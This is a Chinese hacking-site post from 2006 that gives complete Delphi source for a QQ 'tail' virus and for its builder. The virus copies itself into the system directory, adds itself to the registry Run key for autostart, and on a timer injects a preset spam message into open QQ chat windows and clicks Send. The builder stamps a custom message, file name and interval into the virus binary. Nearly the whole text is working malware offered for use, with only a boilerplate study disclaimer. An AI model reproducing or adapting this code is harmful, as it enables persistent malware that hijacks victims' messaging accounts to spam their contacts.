欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

QQ消息轰炸机的代码及原理

来源:www.hack58.com 作者:佚名 时间:2006-08-07 TAG: 我要投稿
 

******************************************
                病毒文件代码
******************************************
program QQtailer;

uses
Windows,
Messages,
SysUtils,
Registry;

Const
MyMessage='AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';     //消息长度150
FileName ='ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ';//文件名30
WaitTime ='TTTTTTTTTT'; //时间10

var
TimerHandle:WORD;
MSG:TMSG;
SystemPath :array[0..128] of char;
SysPath:String;
procedure TimerProc(Wnd:HWnd;Msg,TimerID,dwTime:DWORD);stdcall;
var
hLastWin,hButton : THandle;
szWindowText: array[0..MAX_PATH] of Char;
szTextLength: Integer;
QQName:String;
begin
hLastWin := GetForegroundWindow;
GetClassName(hLastWin,szWindowText,SizeOf(szWindowText));
if szWindowText <>'#32770' then Exit;
szTextLength := SendMessage(hLastWin, WM_GETTEXT, MAX_PATH, Integer(@szWindowText[0]));
szWindowText[szTextLength] := #0;
if (Pos('聊天中',szWindowText)>0) or (Pos('群',szWindowText)>0) then
begin
  QQName:=Copy(szWindowText,Pos(' ',szWindowText)+1,Pos('聊天中',szWindowText)-Pos(' ',szWindowText)-2);
  hLastWin := FindWindowEx(hLastWin, THandle(nil),'#32770',nil);
  if hLastWin=0 then Exit;
  hButton := FindWindowEx(hLastWin, THandle(nil),nil,'发送(&S)');
  if hButton=0 then Exit;  
  hLastWin := FindWindowEx(hLastWin, THandle(nil),'AfxWnd42',nil);
  if hLastWin=0 then Exit;
  hLastWin := FindWindowEx(hLastWin, THandle(nil),'RICHEDIT',nil);
  if hLastWin=0 then Exit;
  QQName:=MyMessage;
  SendMessage(hLastWin,EM_REPLACESEL,180,Integer(Pchar(QQName)));
  SendMessage(hButton, WM_LBUTTONDOWN, 0, 0);
  SendMessage(hButton, WM_LBUTTONUP, 0, 0);
end;
end;

procedure StartTimer(Interval:DWORD);
begin
TimerHandle:=SetTimer(0,0,Interval,@TimerProc);
end;

Procedure AutoRun;
var
Reg:TRegistry;
begin
Reg:=TRegistry.Create;
try
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',False);
Reg.WriteString('SystemFile',SysPath);
finally
Reg.CloseKey;
Reg.Free;
end;


end;

begin
GetSystemDirectory(SystemPath,128);
SysPath:=SystemPath + '\' + FileName;
CopyFile(pchar(ParamStr(0)),Pchar(SysPath),False);
AutoRun;
StartTimer(StrToInt(WaitTime));
AutoRun;
while(GetMessage(Msg,0,0,0))do
begin
  AutoRun;
  TranslateMessage(Msg);
  DispatchMessage(Msg);
end;
end.

********************************************
                  制造机代码
        [我用了皮肤控件大家可能过不了编译]
********************************************
unit Unit1;

interface

uses
Windows, SysUtils,Forms, SkinData, DynamicSkinForm, spTrayIcon, SkinHint, SkinCtrls,
StdCtrls, SkinBoxCtrls,ShellAPI, spSkinShellCtrls, Classes,
Controls, Mask;

type
TForm1 = class(TForm)
  spDynamicSkinForm1: TspDynamicSkinForm;
  spSkinData1: TspSkinData;
  spCompressedStoredSkin1: TspCompressedStoredSkin;
  spTrayIcon1: TspTrayIcon;
  spSkinHint1: TspSkinHint;
  spSkinStatusBar1: TspSkinStatusBar;
  spSkinStatusPanel1: TspSkinStatusPanel;
  spSkinStatusPanel2: TspSkinStatusPanel;
  BBuild: TspSkinSpeedButton;
  CloseAll: TspSkinSpeedButton;
  spSkinLabel1: TspSkinLabel;
  EFileName: TspSkinEdit;
  spSkinLabel2: TspSkinLabel;
  WWaitTime: TspSkinSpinEdit;
  spSkinLabel3: TspSkinLabel;
  Mem TspSkinMemo;
  spSkinLabel4: TspSkinLabel;
  EFilePath: TspSkinEdit;
  spSkinSpeedButton3: TspSkinSpeedButton;
  spSkinStdLabel1: TspSkinStdLabel;
  SSaveDia: TspSkinSaveDialog;
  spSkinData2: TspSkinData;
  spCompressedStoredSkin2: TspCompressedStoredSkin;
  procedure FormResize(Sender: TObject);
  procedure CloseAllClick(Sender: TObject);
  procedure FormShow(Sender: TObject);
  procedure spSkinStdLabel1Click(Sender: TObject);
  procedure EFileNameExit(Sender: TObject);
  procedure BBuildClick(Sender: TObject);
  procedure spSkinSpeedButton3Click(Sender: TObject);
private
  { Private declarations }
public
  { Public declarations }
end;

const
OFFSET_MSG = 72796;     //消息
OFFSET_FileName = 73676;   //文件名
OFFSET_Time = 73716;     //时间


var
Form1: TForm1;

implementation

{$R *.dfm}
{$R QQ.res}

Function Split(s,s1:string):TStringList;
begin
Result:=TStringList.Create;
while Pos(s1,s)>0 do
begin
  Result.Add(Copy(s,1,Pos(s1,s)-1));
  Delete(s,1,Pos(s1,s));
end;
Result.Add(s);
end;

procedure TForm1.FormResize(Sender: TObject);
begin
spSkinStatusPanel1.Width:=Form1.Width-130;
end;

procedure TForm1.CloseAllClick(Sender: TObject);
begin
Application.Terminate;
end;

procedure TForm1.FormShow(Sender: TObject);
begin
//显示出生成文件的路径
EFilePath.Text:=ExtractFilePath(ParamStr(0)) + 'QQTailer.exe';
end;

procedure TForm1.spSkinStdLabel1Click(Sender: TObject);
begin
ShellExecute(Handle,'open','http://wpa.qq.com/msgrd?V=1&Uin=360695670&Site=QQ病毒生成器&Menu=yes',nil,nil,0);
end;

procedure TForm1.EFileNameExit(Sender: TObject);
var
Sl:TStringList;
KZM:String;
i:Integer;
begin
sl:=Split(EFileName.Text,'.');
i:=Sl.Count;
KZM:=Sl.Strings[i-1];
if KZM<>'exe' then
begin
  EFileName.Text:=EFileName.Text + '.exe';
end;
end;

procedure TForm1.BBuildClick(Sender: TObject);

var
WriteBuff, ziyuanzhizhen: PChar;
ziyuanweizhi: HRSRC;
ziyuandaxiao, BytesWritten: Longword;
shujuchulijubing: THandle;
shenqingzhizhen: THandle;
MyMsg,FName,FileURL,WaitTime:string;
begin

MyMsg:=trim(Memo.Text);
FName:=Trim(EFileName.text);
FileURL:=Trim(EFilePath.Text);
WaitTime:=Trim(WWaitTime.Text);

try

ziyuanweizhi := FindResource(HInstance, 'QQ', RT_RCDATA);
ziyuandaxiao := SizeofResource(HInstance, ziyuanweizhi);
shujuchulijubing := LoadResource(HInstance, ziyuanweizhi);
ziyuanzhizhen := LockResource(shujuchulijubing);
shenqingzhizhen := CreateFile(pchar(FileURL), GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
WriteFile(shenqingzhizhen, ziyuanzhizhen^, ziyuandaxiao, BytesWritten, nil);
Sleep(100);
{****   这里是写入信息数据   ****}
SetFilePointer(shenqingzhizhen, OFFSET_MSG, nil, FILE_BEGIN);
WriteBuff := PChar(MyMsg + StringOfChar(#0, 150 - Length(MyMsg)));
WriteFile(shenqingzhizhen, WriteBuff^, 150, BytesWritten, nil);

{****   这里写入第二个数据   ****}
SetFilePointer(shenqingzhizhen, OFFSET_FileName, nil, FILE_BEGIN);
WriteBuff := PChar(FName + StringOfChar(#0, 30 - Length(FName)));
WriteFile(shenqingzhizhen, WriteBuff^, 30, BytesWritten, nil);

{****   这里写入第三个数据   ****}
SetFilePointer(shenqingzhizhen, OFFSET_Time, nil, FILE_BEGIN);
WriteBuff := PChar(WaitTime + StringOfChar(#0, 10 - Length(WaitTime)));
WriteFile(shenqingzhizhen, WriteBuff^, 10, BytesWritten, nil);

CloseHandle(shenqingzhizhen);//关闭资源
Application.MessageBox('恭喜您!文件生成成功!','恭喜您',64);
Except
Application.MessageBox('生成文件失败!请检查操作!','错误',16);
end;
end;

procedure TForm1.spSkinSpeedButton3Click(Sender: TObject);
begin
if ssavedia.Execute then
EFilePath.Text:=Ssavedia.FileName;
end;

end.

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载